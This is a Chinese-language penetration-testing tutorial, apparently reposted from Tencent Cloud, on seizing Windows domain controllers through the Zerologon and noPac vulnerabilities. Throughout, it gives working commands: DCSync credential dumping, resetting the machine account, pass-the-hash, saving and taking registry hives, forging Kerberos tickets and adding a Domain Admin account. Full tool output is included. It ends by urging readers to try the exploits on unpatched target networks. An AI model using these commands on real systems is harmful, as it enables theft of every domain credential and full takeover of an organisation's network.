基础 | 内网渗透,一键拿下域控的两个漏洞
基础 | 内网渗透,一键拿下域控的两个漏洞
今天来总结一下内网环境下,有哪些与域相关的漏洞,可以直接尝试,用于横向移动,更快的突破域控,拿到最高权限,历史上出现过两个漏洞。
CVE-2020-1472
CVE-2020-1472 是一个 windows 域控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。
利用工具:
https://github.com/mstxq17/cve-2020-1472
操作步骤(mac 作为攻击机,目标域控 10.211.55.38)
1、本地先尝试利用域控密码,导出域机器账户的 Hash,方 便与修改之后来对比。
proxychains4 secretsdump.py test.local/Administrator:'123QWEqwe!@#'@10.211.55.38 -just-dc-user "DC$"
或者去掉双引号,但是要注意在linux下$代表是变量的意思记得转义。
proxychains4 secretsdump.py test.local/Administrator:'123QWEqwe!@#'@10.211.55.38 -just-dc-user DC$
2、使用zerologon_tester.py,验证是否存在漏洞
python3 zerologon_tester.py DC 10.211.55.38
返回 Success,代表存在漏洞。
3、使用cve-2020-1472-exploit.py将机器账户重置
python3 cve-2020-1472-exploit.py dc$ 10.211.55.38
4、再次查看机器密码是否修改为空。
5、域控的机器账户可以使用 DCSync 导出域内所有用户凭据、导出原理:
利用DRS(Directory Replication Service,目录复制服务)协议通过IDL_DRSGetNCChanges从域控制器复制用户凭据。
proxychains4 secretsdump.py test.local/dc$@10.211.55.38 -no-pass
6、复DC$机器账户的密码 通过
proxychains4 secretsdump.py test.local/dc$@10.211.55.38 -no-pass -just-dc | grep 'Administrator'
获取到域管的 hash:
然后通过wmic, pass the hash 拿到域控制器中的本地管理员权限(域管)
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8adfc85c3490040e942ae1e6c68f645e test.local/Administrator@10.211.55.38
然后分别执行,拷贝本机中 SAM 数据库到 MAC 端:
- reg save HKLM\SYSTEM system.save
- reg save HKLM\SAM sam.save
- reg save HKLM\SECURITY security.save
- get system.save
- get sam.save
- get security.save
- del /f system.save
- del /f sam.save
- del /f security.save
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
提取出机器账号的明文hex
最后执行
proxychains4 python3 restorepassword.py DC@DC -target-ip 10.211.55.38 -hexpass 87e2812ccea41210c80e298c9e2a43a249d6a4056027787774340fbfd4b5f969563803b0f1bae7ccd24b29b41ae611025f1952793562d73e7f4e0f8938b3361332b35dd5ee22785b79b922149db32dc5c9301f4fd9fd090f532575bf5197a9c9230955bfd96ab928ae66b3999730c75b8545e26770816f21f2dbf9dbb19432211a91224c4c618507f7091ae09435a13a04bad5f056e72d34a96f67fa33d50e7596eca7709f398d98ba9e07407d7b2e4b937e40d1bf5ff0eb2240bdf0e8287e26ea5f8e69219fa7b1c5aa0e0bd8b992a176c32b0efb914fa6c1e53d69179110b02dfc1b1a0e53b445b92588420af18960
可以看到信息完整恢复了。
CVE-2021-42287
2021 年 11 月 9 日,国外研究员在推特上发布了 Active Directory 相关的 CVE,CVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致域内普通用户权限提升至域管权限。
利用工具, 需要自己编译为 exe 文件:
https://github.com/cube0x0/noPac
运行 noPac.exe 需要 .net 环境,下载地址:
https://www.microsoft.com/zh-cn/download/confirmation.aspx?id=17718
执行命令,查看是否存在漏洞,顺便可以拿到域控的机器账号,看到这里的票据大小为 537,有师傅提醒说如果票据大于 1000,就是添加了 PAC,没有这个漏洞了。
.\noPac.exe scan -domain vulntarget.com -user win101 -pass admin#123 //账号密码为域成员win10的
可以看到是存在漏洞,能拿到票据。执行以下命令传递票据。
.\noPac.exe -domain vulntarget.com -user win101 -pass admin#123 /dc WIN-UH20PRD3EAO.vulntarget.com /mAccount test /mPassword QWEasd123 /service cifs /ptt//这里会增加一个密码为admin@123的机器账号test
C:\Users\win101\Desktop\Powermad-master>.\noPac.exe -domain vulntarget.com -user win101 -pass admin#123 /dc WIN-UH20PRD3EAO.vulntarget.com /mAccount test /mPassword QWEasd123 /service cifs /ptt[+] Distinguished Name = CN=test,CN=Computers,DC=vulntarget,DC=com[+] Machine account test added[+] Machine account test attribute serviceprincipalname cleared[+] Machine account test attribute samaccountname updated[+] Got TGT for WIN-UH20PRD3EAO.vulntarget.com[+] Machine account test attribute samaccountname updated[*] Action: S4U[*] Using domain controller: WIN-UH20PRD3EAO.vulntarget.com (10.0.10.100)[*] Building S4U2self request for: 'WIN-UH20PRD3EAO@VULNTARGET.COM'[*] Sending S4U2self request[+] S4U2self success![*] Substituting alternative service name 'cifs/WIN-UH20PRD3EAO.vulntarget.com'[*] Got a TGS for 'administrator' to 'cifs@VULNTARGET.COM'[*] base64(ticket.kirbi): doIFzDCCBcigAwIBBaEDAgEWooIEuDCCBLRhggSwMIIErKADAgEFoRAbDlZVTE5UQVJHRVQuQ09NojEwL6ADAgEBoSgwJhsEY2lmcxseV0lOLVVIMjBQUkQzRUFPLnZ1bG50YXJnZXQuY29to4IEXjCCBFqgAwIBEqEDAgEDooIETASCBEirOVpwF2mskeBncTRkD5gQcgRUTZyU/OsEvtM7iT9ZOsJqBpkHZGvLILAvVCTiPcQ2SFaJxwWrvYzpNBNwrdriWoIOcSmbLc5DPSCvoLTkUIUZJWAX8czSuoleU/3dZ5gJpHUYKjPa/MEW/KWlr2hHE7IjgskiOrPy89MpIVQAI/iH1BvnoaVxEP6LNmQvrQXO9DOFvQigt3qh87Pc+n6bJ7HBBW6PTQiXTLlwDPLbJfuRU8UqTiUIpuS/hhT9nNTtzOF8Mb1SuXpYG97igldulsWHWlSs6gpFFe5wKtpGHluKUHWBOoQe4lZo/EgCmEGZfO/YNfIfiE7+fyLHMNfkecaDboKFi/6UKKihV5eTCwYAiaoDWuwBxMCOC1VbptozpyiSvFmwjtkYakK6DQKWdOSb4Ia2AXp3OEfTvcfq9cWQavNAOFMNR6txisCUko4+PCofEu9sL26w6vdqPnYLfie1aMLs/DWjavuWe6/8j2EcwX6vgvJYVXgSXQibnhVDbn7mf+4Tfaa4ht096fKX54j5ja9CjaElRuCogqW3TUeDSYUpjvMcpDPax0cLR/99/uZnx+s9BLda+jQX4lh3OmxtmUW8CjZS6Sv3XQW/CyhzD4B2RFPXk3Ya7j56F3Wikeq6yW9AHF2EuD+9fNpMhg2nydv9vtt19mAj2BfljXKWJz4EXnbT+sYEapcwchvufHQu6a2n/+iq2G9tjSkH6Z2Vnn8Ui+gJeTm2im+pVBntKR0CpnEAKlCtD3G5/RlqkZchY2zBPebMiyqx0mtBWqMMaTS3p0D//FLvX1oo3g80zShCelw4y+J3Z8MGZdUFw21Mckz9eIk5jt0VcX4h5snC/OlrMN7+yJAUl1tqC/O8tp4q2J9Jbqz+W5idJjNj1EGvnJ6kZ6owo/87qigObGchJKLZkS4wAuSe3kSh0PyirIBowjKJMVKtTg5ruW6y6cS+SGRLk5PRS7b9apSUKdH26XvXCLepH4s9Aje+fmLCPwzwVGp2+ErWeBOy6Pyi7malGE601/eg0M5XuaTc7EahgQuHY8KIZ8RBFJRrkMiULiBNctewgdm1bzRol0/GqtZT+5aH27klcGfLx3D8yUCylkl2o7sJVUwcNo6fYwtfElvm5JM9EiujfzDgkUTjSCSBrR9f/BihHNqYFVUfvhQDBAsL/6Lmo7nlMQN++Gq/oPukS5o6m/nykNwhbF178gtSE45jGKiGgBzvSFIkqI6I4JGxKJmpzk6UgoVL1BxguCkbgO/dlRhqvbjdSw5PrOph5KsiWkxwYuCvhCVs4EU23zvm0jrzhAsJwmQVVry9vhZLBRzagWSWEPD1g9vzIJoV/aO4GXgtcN/bbCfnodZ39SKosTinJ7E+tQpHipy+l54flXZHI9hapjpG5l7IvBScOARggTVaAV9L8fbvWyQJTjN8OgmF1L1DVQQnu03HBmCjqTIdo4H/MIH8oAMCAQCigfQEgfF9ge4wgeuggegwgeUwgeKgKzApoAMCARKhIgQg6IvCqN83Pz8hva8aEtoE655mm+mQdTAURKY5uKitJMGhEBsOVlVMTlRBUkdFVC5DT02iGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJhdG9yowcDBQAApQAApREYDzIwMjExMjE0MDEyNjA2WqYRGA8yMDIxMTIxNDExMjYwNlqnERgPMjAyMTEyMjEwMTI2MDZaqBAbDlZVTE5UQVJHRVQuQ09NqTEwL6ADAgEBoSgwJhsEY2lmcxseV0lOLVVIMjBQUkQzRUFPLnZ1bG50YXJnZXQuY29t[+] Ticket successfully imported!在域控上会多一个机器账号test
添加域管账号
net user admin QWEasd@123 /add /domainnet group "Domain Admins" admin /add /domain
查看域管账号是否添加成功
net group "domain admins" /domain
有了域控账密,可以使用PsExec64.exe来对域控进行下一步的操作,开3389之类的。
到此就已经拿下域控了。
总结
这里整理了两个可以直接打域控的历史漏洞,如果目标内网域控未升级,那么只要你能进入内网,不妨试一下,说不定可以一步到位拿下域控,走上人生巅峰。
腾讯云开发者
